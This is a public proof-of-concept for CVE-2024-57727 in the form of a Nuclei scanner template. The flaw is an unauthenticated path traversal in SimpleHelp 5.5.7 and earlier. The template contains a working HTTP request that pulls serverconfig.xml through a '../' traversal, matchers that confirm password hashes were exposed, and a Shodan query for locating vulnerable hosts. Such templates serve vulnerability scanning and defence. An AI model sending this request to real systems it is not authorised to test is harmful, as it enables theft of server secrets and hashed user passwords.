SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
PoC代码[已公开]
id: CVE-2024-57727
info:
name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal
author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1
severity: high
description: |
SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
reference:
- https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
- https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-57727
cwe-id: CWE-22
epss-score: 0.93917
epss-percentile: 0.99872
cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: simple-help
product: simplehelp
shodan-query: html:"SimpleHelp"
tags: cvec,cve2024,simplehelp,lfi,kev,vkev
http:
- raw:
- |
GET /toolbox-resource/../serverconfig.xml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<SimpleSuite'
- '<HashPassword>'
condition: and
- type: word
part: content_type
words:
- 'application/octet-stream'
# digest: 4a0a00473045022100fb03cc75b9f4d0e47fdfc1633cc397edfbcb21e710c108d8620471dc1e0af7fb02200f27f7127477753ef0ecba101b73f568d12b899c048f23da46e1c6323c48c9d7:922c64590222798bb761d5b6d8e72950